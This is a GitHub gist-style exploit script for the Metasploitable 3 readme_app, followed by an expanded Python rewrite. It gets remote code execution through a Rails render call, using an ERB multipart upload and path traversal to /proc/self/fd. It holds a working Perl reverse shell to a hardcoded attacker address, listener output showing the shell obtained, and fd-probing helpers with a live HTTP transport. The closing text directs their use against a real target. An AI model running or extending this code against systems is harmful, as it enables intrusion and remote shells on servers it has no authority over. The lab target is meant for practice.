@pich4ya
Last active February 8, 2020 23:40
Fix broken rails_dynamic_render_code_exec's exploit against Metasploitable 3
# @author Pichaya Morimoto (p.morimoto@sth.sh)
# Exploit for Metasploitable 3 - RCE through `render params[:os]` in readme_app (port 3500)
# msf: multi/http/rails_dynamic_render_code_exec is not working here due to no ImageMagick
# This exploit slightly adjusts the temporary file extension to an empty string:
# the uploaded part is named "ggez" with no extension, so the Rack tempfile gets none.
import requests

host = "172.28.128.3"  # target (Metasploitable 3)
# Perl reverse shell back to the attacker's listener at 192.168.15.133:4444
cmd = "perl -e 'use Socket;$i=\"192.168.15.133\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"

# 1. tmp upload: send an ERB template as a multipart file part. Rack writes it to a
#    tempfile that the Rails worker keeps open on a file descriptor (fd 7 here).
headers = {"Content-Type": "multipart/form-data; boundary=_Part_596_558276832_972275724", "Connection": "close"}
payload = "--_Part_596_558276832_972275724\r\nContent-Disposition: form-data; name=\"ggez\"; filename=\"ggez\"\r\n\r\n<%=`"+cmd+"`%>\r\n--_Part_596_558276832_972275724--\r\n"
requests.post("http://"+host+":3500/", headers=headers, data=payload)

# 2. trigger: `render params[:os]` takes a path, so traverse out of the view
#    directory to the still-open tempfile via /proc/self/fd/7; ERB evaluates <%=`cmd`%>
requests.get("http://"+host+":3500/readme/?os=../../../../proc/self/fd/7")
'''
$ python readme_render_exploit.py
$ nc -lvp 4444
listening on [any] 4444 ...
192.168.15.1: inverse host lookup failed: Unknown host
connect to [192.168.15.133] from (UNKNOWN) [192.168.15.1] 50209
pwd
/opt/readme_app
id
uid=1124(chewbacca) gid=100(users) groups=100(users),999(docker)
ls
Gemfile
Gemfile.lock
README.md
Rakefile
app
bin
config
config.ru
db
lib
log
public
start.sh
test
tmp
vendor
'''
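The gist hardcodes /proc/self/fd/7, but which descriptor the Rack tempfile lands on depends on what the worker process already has open, so a reusable version has to probe. The following is an added example, not the gist's own code: it keeps the gist's endpoints (POST / for the upload, GET /readme/?os=... for the trigger), boundary and payload shape, adds a marker to the template so a hit can be recognised, and probes a range of descriptors. FakeRailsWorker, the marker string and the fd range are constructed assumptions so the flow runs offline; the fake only echoes the stored file back and does not evaluate ERB.

```python
"""Exploit helpers for the readme_app dynamic-render bug, with fd probing.

Added example; not part of the original gist. Same endpoints and payload
shape as the gist, plus a marker and descriptor probing. FakeRailsWorker,
MARKER and the default fd range are constructed for offline use.
"""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional, Tuple

BOUNDARY = "_Part_596_558276832_972275724"  # boundary reused from the gist
MARKER = "renderhit"                         # constructed marker string


def erb_payload(cmd: str, marker: str = MARKER) -> str:
    """ERB that prints the marker, then runs cmd via backticks.
    A backtick or '%>' inside cmd would break out of the literal, so refuse them."""
    if "`" in cmd or "%>" in cmd:
        raise ValueError("cmd must not contain ` or %>")
    return f"<%= '{marker}' %><%= `{cmd}` %>"


def multipart_upload(template: str, field: str = "ggez",
                     filename: str = "ggez") -> Tuple[dict, bytes]:
    """Multipart body carrying the template as a file part. The filename has
    no extension so the Rack tempfile gets none either (the gist's adjustment)."""
    headers = {"Content-Type": f"multipart/form-data; boundary={BOUNDARY}",
               "Connection": "close"}
    body = (f"--{BOUNDARY}\r\n"
            f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
            f"\r\n{template}\r\n"
            f"--{BOUNDARY}--\r\n")
    return headers, body.encode()


def trigger_param(fd: int, depth: int = 4) -> str:
    """Value for ?os= : climb out of the view directory into /proc/self/fd/N."""
    return "../" * depth + f"proc/self/fd/{fd}"


def find_fd(get: Callable[[str], str], fd_range: Iterable[int],
            marker: str = MARKER) -> Optional[int]:
    """Try each candidate descriptor; the first response containing the marker
    came from the rendered template. Returns None if no candidate hits."""
    for fd in fd_range:
        if marker in get(trigger_param(fd)):
            return fd
    return None


def exploit(post: Callable[[dict, bytes], None], get: Callable[[str], str],
            cmd: str, fd_range: Iterable[int] = range(3, 64)) -> Optional[int]:
    """Upload the template, then probe descriptors until it renders."""
    headers, body = multipart_upload(erb_payload(cmd))
    post(headers, body)
    return find_fd(get, fd_range)


def http_transport(host: str, port: int = 3500):
    """Real transport via urllib against the gist's endpoints (assumed)."""
    base = f"http://{host}:{port}"

    def post(headers: dict, body: bytes) -> None:
        req = urllib.request.Request(base + "/", data=body, headers=headers, method="POST")
        urllib.request.urlopen(req, timeout=10).read()

    def get(param: str) -> str:
        url = base + "/readme/?os=" + urllib.parse.quote(param, safe="/")
        try:
            return urllib.request.urlopen(url, timeout=10).read().decode(errors="replace")
        except urllib.error.HTTPError as err:  # a miss usually comes back as 500
            return err.read().decode(errors="replace")

    return post, get


class FakeRailsWorker:
    """Constructed stand-in for the target: keeps the uploaded part as if Rack
    had written it to a tempfile open on descriptor `tempfile_fd`, and serves
    the raw file back for the matching ?os= value (no ERB evaluation)."""

    def __init__(self, tempfile_fd: int = 7):
        self.tempfile_fd = tempfile_fd
        self.files = {}  # fd -> file contents

    def post(self, headers: dict, body: bytes) -> None:
        text = body.decode()
        start = text.index("\r\n\r\n") + 4
        end = text.index(f"\r\n--{BOUNDARY}--")
        self.files[self.tempfile_fd] = text[start:end]

    def get(self, os_param: str) -> str:
        for fd, content in self.files.items():
            if os_param.endswith(f"/proc/self/fd/{fd}"):
                return content
        return "ActionView::MissingTemplate"


if __name__ == "__main__":
    worker = FakeRailsWorker(tempfile_fd=7)
    print(exploit(worker.post, worker.get, "id"))  # 7 against the fake
```

Against a live target, replace the fake with `post, get = http_transport("172.28.128.3")` and pass the gist's reverse-shell command as `cmd`; the returned descriptor is the one to reuse for later triggers as long as the worker process keeps the tempfile open.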